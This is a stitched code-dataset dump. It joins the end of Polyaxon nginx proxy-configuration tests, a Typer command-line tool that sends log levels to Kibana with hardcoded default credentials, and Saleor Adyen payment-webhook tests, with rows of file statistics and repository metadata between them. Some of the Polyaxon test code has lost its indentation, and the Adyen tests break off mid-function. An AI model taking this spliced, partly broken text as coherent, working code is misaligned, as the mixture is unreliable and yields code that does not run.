    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
""" # noqa
        assert get_api_location_config(resolver="") == expected
        # External https host on port 443: https pass-through with SNI and a fixed Host header.
        settings.PROXIES_CONFIG.api_port = 443
        settings.PROXIES_CONFIG.api_host = "polyaxon.foo.com"
        expected = r"""
location = / {
    proxy_ssl_server_name on;
    proxy_pass https://polyaxon.foo.com;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /api/v1/ {
    proxy_ssl_server_name on;
    proxy_pass https://polyaxon.foo.com;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /ui/ {
    proxy_ssl_server_name on;
    proxy_pass https://polyaxon.foo.com;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /sso/ {
    proxy_ssl_server_name on;
    proxy_pass https://polyaxon.foo.com;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /static/ {
    proxy_ssl_server_name on;
    proxy_pass https://polyaxon.foo.com;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
""" # noqa
        assert get_api_location_config(resolver="") == expected
        # Add proxy
        # NOTE(review): with the forward proxy configured, traffic is expected
        # to go to https://127.0.0.1:8443 (local tunnel) while keeping the
        # original Host header; 8443 does not come from forward_proxy_port — confirm.
        settings.PROXIES_CONFIG.has_forward_proxy = True
        settings.PROXIES_CONFIG.forward_proxy_port = 443
        settings.PROXIES_CONFIG.forward_proxy_host = "moo.foo.com"
        expected = r"""
location = / {
    proxy_ssl_server_name on;
    proxy_pass https://127.0.0.1:8443;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /api/v1/ {
    proxy_ssl_server_name on;
    proxy_pass https://127.0.0.1:8443;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /ui/ {
    proxy_ssl_server_name on;
    proxy_pass https://127.0.0.1:8443;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /sso/ {
    proxy_ssl_server_name on;
    proxy_pass https://127.0.0.1:8443;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
location /static/ {
    proxy_ssl_server_name on;
    proxy_pass https://127.0.0.1:8443;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host polyaxon.foo.com;
    proxy_buffering off;
}
""" # noqa
        assert get_api_location_config(resolver="") == expected
def test_auth_config(self):
settings.PROXIES_CONFIG.auth_enabled = True
expected = r"""
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
""" # noqa
assert get_auth_config() == expected
settings.PROXIES_CONFIG.auth_enabled = False
assert get_auth_config() == ""
def test_auth_location_config(self):
    """The internal /auth/v1/ location proxies auth subrequests to the API.

    A `resolver` directive is only rendered when BOTH the global
    dns_use_resolver flag AND the auth-specific auth_use_resolver flag
    are enabled.
    """
    settings.PROXIES_CONFIG.auth_use_resolver = False
    settings.PROXIES_CONFIG.dns_use_resolver = False
    settings.PROXIES_CONFIG.auth_enabled = True
    expected = r"""
location = /auth/v1/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver="") == expected
    # Use resolver but do not enable it for auth
    settings.PROXIES_CONFIG.dns_use_resolver = True
    settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
    settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
    assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
    resolver = get_resolver()
    # auth_use_resolver is still False, so the rendered block is unchanged
    # even though a non-empty resolver value is passed in.
    expected = r"""
location = /auth/v1/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver=resolver) == expected
    # Enable resolver for auth
    settings.PROXIES_CONFIG.auth_use_resolver = True
    # Now the resolver directive (with its 5s validity cache) is rendered.
    expected = r"""
location = /auth/v1/ {
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver=resolver) == expected
def test_external_auth_location_config(self):
    """With auth_external set, auth subrequests target the external host.

    When has_forward_proxy is enabled the proxy_pass target becomes the
    local tunnel (https://127.0.0.1:8443) while the Host header keeps the
    original external hostname.
    """
    settings.PROXIES_CONFIG.auth_use_resolver = False
    settings.PROXIES_CONFIG.auth_enabled = True
    settings.PROXIES_CONFIG.auth_external = "https://cloud.polyaxon.com"
    expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://cloud.polyaxon.com;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver="") == expected
    # Add proxy
    settings.PROXIES_CONFIG.has_forward_proxy = True
    settings.PROXIES_CONFIG.forward_proxy_port = 443
    settings.PROXIES_CONFIG.forward_proxy_host = "123.123.123.123"
    expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver="") == expected
    # Use resolver but do not enable it for auth
    settings.PROXIES_CONFIG.has_forward_proxy = False
    settings.PROXIES_CONFIG.dns_use_resolver = True
    settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
    settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
    assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
    resolver = get_resolver()
    # auth_use_resolver stays False -> no resolver line is rendered.
    expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://cloud.polyaxon.com;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver=resolver) == expected
    # Add proxy
    settings.PROXIES_CONFIG.has_forward_proxy = True
    expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
    assert get_auth_location_config(resolver="") == expected
| 35.263354
| 238
| 0.664424
| 7,235
| 56,774
| 4.897719
| 0.034416
| 0.073374
| 0.128404
| 0.049781
| 0.960011
| 0.947622
| 0.933512
| 0.921885
| 0.917031
| 0.911613
| 0
| 0.01997
| 0.206204
| 56,774
| 1,609
| 239
| 35.28527
| 0.766304
| 0.016909
| 0
| 0.856846
| 0
| 0.027663
| 0.62866
| 0.129216
| 0
| 0
| 0
| 0
| 0.05325
| 1
| 0.017289
| false
| 0.051176
| 0.006916
| 0
| 0.035961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
81db6137dcbc1a3f073f8ce8ddddc290744d7bf8
| 9,936
|
py
|
Python
|
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# cli_driver.py
# @Author : Gustavo Freitas (gustavo@gmf-tech.com)
# @Link :
# from logger_es_cli.dafaults import decorator_factory
from typing import Optional
import typer
from logger_es_cli import logger_factory, logger
import sys
import ujson as json
app = typer.Typer()
@app.command("configure")
def configure(type_config: str = "env"):
"""
command to configure .env file
"""
typer.echo(f"{type_config}")
@app.command("error")
def log_error(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send ERROR loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment.upper(),
project_name=project_name,
send_debug=send_debug,
)
logger.error(message, extra=extra_args)
typer.echo(
f"send ERROR message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("warning")
def log_warning(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send WARNING loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.warning(message, extra=extra_args)
typer.echo(
f"send WARNING message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("debug")
def log_debug(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send DEBUG loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.debug(message, extra=extra_args)
typer.echo(
f"send DEBUG message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("info")
def log_info(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send INFO loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.info(message, extra=extra_args)
typer.echo(
f"send INFO message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("critical")
def log_critical(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send CRITICAL loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.critical(message, extra=extra_args)
typer.echo(
f"send CRITICAL message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
| 35.870036
| 94
| 0.679147
| 1,204
| 9,936
| 5.331395
| 0.078904
| 0.111388
| 0.076336
| 0.031158
| 0.919146
| 0.919146
| 0.919146
| 0.919146
| 0.891883
| 0.876928
| 0
| 0.009556
| 0.18901
| 9,936
| 277
| 95
| 35.870036
| 0.787044
| 0.034622
| 0
| 0.794521
| 0
| 0
| 0.193555
| 0.020008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0.045662
| 0.022831
| 0
| 0.050228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4b45846e65ac5a8f121e3fe0adb70202b1a2071
| 17,711
|
py
|
Python
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | 1
|
2021-04-22T12:36:32.000Z
|
2021-04-22T12:36:32.000Z
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | 2
|
2021-03-20T10:39:06.000Z
|
2021-03-26T01:11:13.000Z
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | null | null | null |
from decimal import Decimal
from unittest import mock
import graphene
import pytest
from ......order import OrderStatus
from ..... import ChargeStatus, TransactionKind
from ...utils import to_adyen_price
from ...webhooks import (
create_new_transaction,
handle_authorization,
handle_cancel_or_refund,
handle_cancellation,
handle_capture,
handle_failed_capture,
handle_failed_refund,
handle_pending,
handle_refund,
handle_reversed_refund,
webhook_not_implemented,
)
def test_handle_authorization(notification, adyen_plugin, payment_adyen_for_order):
    """A plain AUTHORISATION webhook records one successful AUTH transaction."""
    payment = payment_adyen_for_order
    global_payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    webhook_payload = notification(
        merchant_reference=global_payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    plugin_config = adyen_plugin().config

    handle_authorization(webhook_payload, plugin_config)

    assert payment.transactions.count() == 1
    recorded = payment.transactions.get()
    assert recorded.is_success is True
    assert recorded.kind == TransactionKind.AUTH
def test_handle_authorization_with_adyen_auto_capture(
    notification, adyen_plugin, payment_adyen_for_order
):
    # With adyen_auto_capture enabled the AUTHORISATION webhook is stored
    # directly as a CAPTURE transaction instead of AUTH.
    payment = payment_adyen_for_order
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    config.connection_params["adyen_auto_capture"] = True
    handle_authorization(notification, config)
    assert payment.transactions.count() == 1
    assert payment.transactions.get().kind == TransactionKind.CAPTURE


@pytest.mark.vcr
def test_handle_authorization_with_auto_capture(
    notification, adyen_plugin, payment_adyen_for_order
):
    # Plugin-side auto_capture triggers a follow-up capture, so the payment
    # ends with AUTH + CAPTURE transactions and is fully charged.  The
    # psp_reference matches the recorded VCR cassette used by this test.
    payment = payment_adyen_for_order
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        psp_reference="853596537720508F",
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    config.auto_capture = True
    config.connection_params["adyen_auto_capture"] = False
    handle_authorization(notification, config)
    payment.refresh_from_db()
    assert payment.transactions.count() == 2
    assert payment.transactions.first().kind == TransactionKind.AUTH
    assert payment.transactions.last().kind == TransactionKind.CAPTURE
    assert payment.charge_status == ChargeStatus.FULLY_CHARGED


def test_handle_authorization_with_adyen_auto_capture_and_payment_charged(
    notification, adyen_plugin, payment_adyen_for_order
):
    # An already-charged payment must not receive a duplicate transaction.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    config.connection_params["adyen_auto_capture"] = True
    handle_authorization(notification, config)
    # payment already has a charge status no need to handle auth action
    assert payment.transactions.count() == 0
def test_handle_cancel(notification, adyen_plugin, payment_adyen_for_order):
    # A CANCELLATION webhook records a CANCEL transaction and cancels the
    # related order.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_cancellation(notification, config)
    payment.order.refresh_from_db()
    assert payment.transactions.count() == 1
    transaction = payment.transactions.get()
    assert transaction.is_success is True
    assert transaction.kind == TransactionKind.CANCEL
    assert payment.order.status == OrderStatus.CANCELED


def test_handle_cancel_already_canceleld(
    notification, adyen_plugin, payment_adyen_for_order
):
    # A duplicate CANCELLATION webhook must not add a second transaction.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    create_new_transaction(notification, payment, TransactionKind.CANCEL)
    handle_cancellation(notification, config)
    assert payment.transactions.count() == 1


@mock.patch("saleor.payment.gateways.adyen.webhooks.order_captured")
def test_handle_capture(
    mocked_captured, notification, adyen_plugin, payment_adyen_for_order
):
    # A CAPTURE webhook fully charges the payment and notifies
    # order_captured with the captured amount.
    payment = payment_adyen_for_order
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_capture(notification, config)
    assert payment.transactions.count() == 1
    transaction = payment.transactions.get()
    assert transaction.is_success is True
    assert transaction.kind == TransactionKind.CAPTURE
    payment.refresh_from_db()
    assert payment.charge_status == ChargeStatus.FULLY_CHARGED
    mocked_captured.assert_called_once_with(
        payment.order, None, transaction.amount, payment
    )


def test_handle_capture_with_payment_already_charged(
    notification, adyen_plugin, payment_adyen_for_order
):
    # A CAPTURE webhook for an already-captured payment is a no-op.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment.captured_amount = payment.total
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_capture(notification, config)
    # Payment is already captured so no need to save capture transaction
    assert payment.transactions.count() == 0
@pytest.mark.parametrize(
    "charge_status", [ChargeStatus.NOT_CHARGED, ChargeStatus.FULLY_CHARGED]
)
def test_handle_failed_capture(
    charge_status, notification, adyen_plugin, payment_adyen_for_order
):
    # CAPTURE_FAILED resets the charge status to NOT_CHARGED regardless of
    # the starting status.
    payment = payment_adyen_for_order
    payment.charge_status = charge_status
    payment.captured_amount = payment.total
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_failed_capture(notification, config)
    assert payment.transactions.count() == 1
    transaction = payment.transactions.get()
    assert transaction.is_success is True
    assert transaction.kind == TransactionKind.CAPTURE_FAILED
    payment.refresh_from_db()
    assert payment.charge_status == ChargeStatus.NOT_CHARGED


def test_handle_failed_capture_partial_charge(
    notification, adyen_plugin, payment_adyen_for_order
):
    # When more than the failed amount remains captured, the payment drops
    # to PARTIALLY_CHARGED instead of NOT_CHARGED.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment.captured_amount += payment.total * 2
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_failed_capture(notification, config)
    assert payment.transactions.count() == 1
    transaction = payment.transactions.get()
    assert transaction.is_success is True
    assert transaction.kind == TransactionKind.CAPTURE_FAILED
    payment.refresh_from_db()
    assert payment.charge_status == ChargeStatus.PARTIALLY_CHARGED


def test_handle_pending(notification, adyen_plugin, payment_adyen_for_order):
    # A PENDING webhook records a PENDING transaction and charge status.
    payment = payment_adyen_for_order
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_pending(notification, config)
    assert payment.transactions.count() == 1
    transaction = payment.transactions.get()
    assert transaction.is_success is True
    assert transaction.kind == TransactionKind.PENDING
    payment.refresh_from_db()
    assert payment.charge_status == ChargeStatus.PENDING


def test_handle_pending_with_adyen_auto_capture(
    notification, adyen_plugin, payment_adyen_for_order
):
    payment = payment_adyen_for_order
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    config.connection_params["adyen_auto_capture"] = True
    handle_pending(notification, config)
    # in case of autocapture we don't want to store the pending status as all payments
    # by default get capture status.
    assert payment.transactions.count() == 1
    assert payment.transactions.get().kind == TransactionKind.PENDING
    payment.refresh_from_db()
    assert payment.charge_status == ChargeStatus.PENDING


def test_handle_pending_already_pending(
    notification, adyen_plugin, payment_adyen_for_order
):
    # A duplicate PENDING webhook must not create a second transaction.
    payment = payment_adyen_for_order
